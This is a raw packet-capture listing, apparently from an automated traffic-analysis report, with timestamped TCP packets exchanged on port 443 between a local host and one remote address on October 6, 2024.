                                                                                                                                                Oct 6, 2024 22:18:54.567147970 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:54.749105930 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:54.749325991 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:54.749474049 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:54.749553919 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:54.749862909 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:54.749936104 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:54.750364065 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:54.750436068 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:54.751162052 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:54.751246929 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:54.751465082 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:54.751532078 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:54.752135992 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:54.752212048 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:54.752382040 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:54.752449989 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:54.753097057 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:54.753206015 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:54.753355980 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:54.753422022 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:54.754108906 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:54.754193068 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:54.754826069 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:54.754929066 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:54.798120022 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:54.798309088 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:54.798402071 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:54.798475981 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:54.798628092 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:54.798707008 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:54.836173058 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:54.836316109 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:54.980791092 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:54.980865955 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:54.980881929 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:54.980892897 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:54.980935097 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:54.981045961 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:54.981098890 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:54.981343985 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:54.981395960 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:54.981637955 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:54.981688976 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:54.982086897 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:54.982188940 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:54.982355118 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:54.982398987 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:54.982758999 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:54.982793093 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:54.982819080 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:54.982825994 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:54.982847929 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:54.982863903 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:54.983328104 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:54.983402967 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:54.983776093 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:54.983829975 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:54.983899117 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:54.983938932 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:54.983947992 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:54.983952999 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:54.983984947 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:54.984627962 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:54.984680891 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:54.984883070 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:54.984936953 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:54.985177040 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:54.985234976 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:54.985488892 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:54.985529900 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.067528963 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.067677021 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.067727089 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.067775965 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.068006039 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.068057060 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.068244934 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.068291903 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.068581104 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.068640947 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.068875074 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.068928003 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.069081068 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.069139957 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.069222927 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.069269896 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.073412895 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.073498011 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.073540926 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.073591948 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.073823929 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.073870897 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.073988914 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.074033022 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.074253082 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.074297905 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.074450016 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.074498892 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.074682951 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.074734926 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.212750912 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.212827921 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.212904930 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.212954044 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.213083982 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.213138103 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.213433981 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.213484049 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.213651896 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.213700056 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.213948011 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.213995934 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.214319944 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.214359999 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.214369059 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.214375973 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.214397907 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.214420080 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.214843035 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.214890957 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.214893103 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.214901924 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.214932919 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.215399981 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.215440989 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.215455055 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.215460062 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.215481043 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.215493917 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.215789080 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.215836048 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.215995073 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.216054916 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.216093063 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.216135025 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.216135979 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.216145039 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.216180086 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.216845036 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.216897964 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.299787045 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.299963951 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.299979925 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.299993992 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.300035954 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.300179958 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.300228119 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.300409079 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.300458908 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.300753117 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.300805092 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.300995111 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.301043034 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.301204920 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.301271915 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.301656008 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.301709890 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.301718950 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.301758051 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.301768064 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.301774979 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.301800013 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.301815987 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.302191973 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.302248001 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.302486897 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.302541971 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.303026915 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.303080082 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.303081989 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.303091049 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.303122044 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.303134918 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.303188086 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.303628922 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.303864002 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.445753098 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.445858955 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.445889950 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.445919991 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.445950031 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.445956945 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.446033955 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.446085930 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.446408033 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.446455002 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.446480036 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.446516037 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.446535110 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.446547985 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.446805000 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.446865082 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.447063923 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.447110891 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.447182894 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.447231054 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.447859049 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.447906017 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.447926998 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.447937965 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.447956085 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.447962046 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.447978973 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.447983027 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.447993040 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.448010921 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.448045015 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.448050976 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.448086023 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.448853016 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.448904991 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.448915005 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.448920965 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.448940039 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.448944092 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.448961973 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.448966026 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.448975086 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.448992014 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.449024916 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.449031115 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.449062109 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.449729919 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.449805975 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.530915022 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.530996084 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.531157970 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.531210899 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.531590939 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.531666994 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.531702995 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.531753063 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.532016993 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.532087088 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.532533884 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.532581091 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.532592058 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.532599926 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.532628059 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.532641888 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.532814026 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.532864094 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.533010006 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.533103943 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.533474922 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.533523083 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.533550978 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.533587933 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.533612013 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.533624887 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.533884048 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.533931971 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.534248114 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.534296989 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.534465075 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.534513950 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.534542084 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.534584999 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.534938097 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.534987926 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.618304014 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.618444920 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.618510008 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.618510008 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.618541956 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.618592024 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.618725061 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.618786097 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.618952990 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.619007111 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.619196892 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.619247913 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.619424105 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.619476080 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.619837999 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.619893074 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.620212078 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.620253086 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.620265007 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.620270967 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.620299101 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.620323896 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.620552063 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.620608091 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.620654106 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.620704889 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.621192932 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.621247053 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.621258020 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.621263981 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.621294022 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.621294022 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.621304989 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.621335983 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.621336937 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.621349096 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.621352911 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:55.621380091 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:55.621409893 CEST63886443192.168.2.6103.6.198.219
